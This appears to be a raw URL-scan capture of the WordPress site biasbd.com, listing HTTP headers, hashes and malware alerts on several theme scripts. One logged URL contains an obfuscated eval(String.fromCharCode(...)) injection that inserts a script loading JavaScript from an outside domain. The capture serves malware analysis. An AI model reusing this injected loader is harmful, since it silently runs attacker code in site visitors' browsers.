Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2
216.58.207.195200 OK 47 kB URL HTTP/2 fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 47048, version 1.0\012- data
Hash 87a1556b696ae2cb1a726bd8c4584a2f
1be0f6f39e0cf316f9827f945eeeaef8294cc37b
141f0c53e457585d4ac7426eb3d757666d250ee6fbf0e9c0878128e4c627f0b1
GET /s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 47048
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 19:27:54 GMT
expires: Thu, 28 Sep 2023 19:27:54 GMT
cache-control: public, max-age=31536000
age: 478563
last-modified: Wed, 27 Apr 2022 16:55:54 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
216.58.207.195200 OK 31 kB URL HTTP/2 fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Hash ac0d2859ea5f8fd6bcb3c305c08ec184
7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 29 Sep 2022 16:40:18 GMT
expires: Fri, 29 Sep 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 402219
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
216.58.207.195200 OK 45 kB URL HTTP/2 fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 45300, version 1.0\012- data
Hash 5fe660c3a23b871807b0e1d3ee973d23
62a9dd423b30b6ee3ab3dd40d573545d579af10a
e13ffa988be59cbf299d7ff68f019f902b60848203ac4990819eb7e4624ee52d
GET /s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 45300
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 19:27:53 GMT
expires: Thu, 28 Sep 2023 19:27:53 GMT
cache-control: public, max-age=31536000
age: 478564
last-modified: Wed, 27 Apr 2022 16:11:08 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
biasbd.com/wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16
111.221.45.32200 OK 6.1 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash b44b26124498d04e349ccdf85f31e3da
6d936f32bba6d3baa7cc26210c2cecf49beef4d2
9c811b9a34dad3db5bc5ab460e3a92a6cebe4c01f61d682616d1308fe5fa4d96
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "6461-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6053
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16
111.221.45.32200 OK 9.8 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (32034), with CRLF line terminators
Hash 92078065c6bac430429cb347bca7d1e8
398b8503c88072d06deee2a54f1f50cfa30e04de
f55e3f9f06ccfc63bb4e9b94234f90202a2760b89acc74fd61fd18a4c9cd2dbf
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "8fd6-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9770
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
172.67.20.217404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 172.67.20.217:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/
HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2022 08:23:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 754c84b8ffe20b65-OSL
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5
111.221.45.32200 OK 9.9 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (32004)
Hash 45b6e9c3bb08e0e74f9d9e738bf95011
a9946063b6a32bd95fe9cae75f8632e4c56c590c
691322524f1e6e1634ead2eb07421f8aea3b3342d3e6322efb10a15270a5315c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:41:38 GMT
etag: "8aaf-5c21c312-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9866
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16
111.221.45.32200 OK 3.4 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (6354), with CRLF line terminators
Hash 3a477a80b3dba84bdd15c517b7f83df7
f54aae0b203de8a874ecb53681c54c1960148bfa
7c2ea48d8f2f5e0d3593a85fb9e983e92d1d4e90b0a1d20acfa5e5debacdaf6e
GET /wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "260f-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3353
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/functions.js?ver=5.2.16
111.221.45.32200 OK 11 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/functions.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1673), with CRLF line terminators
Hash d91365dc0d9fa0c38d9beba66a97c179
2c13fee9a5d1ba23cb41b74e4b0e31c5d6256333
54f0a1eac958391d995f5afc56a83c3c83c805638d338d21c90a1952dc8a7a99
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/functions.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Fri, 17 Jun 2016 03:51:30 GMT
etag: "9e12-576373c2-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 10624
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16
111.221.45.32200 OK 18 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash 3b8621875de5d05c8eaff0e926ee41a9
1fc9d27c012e905c13410a3b509f29271bcc6152
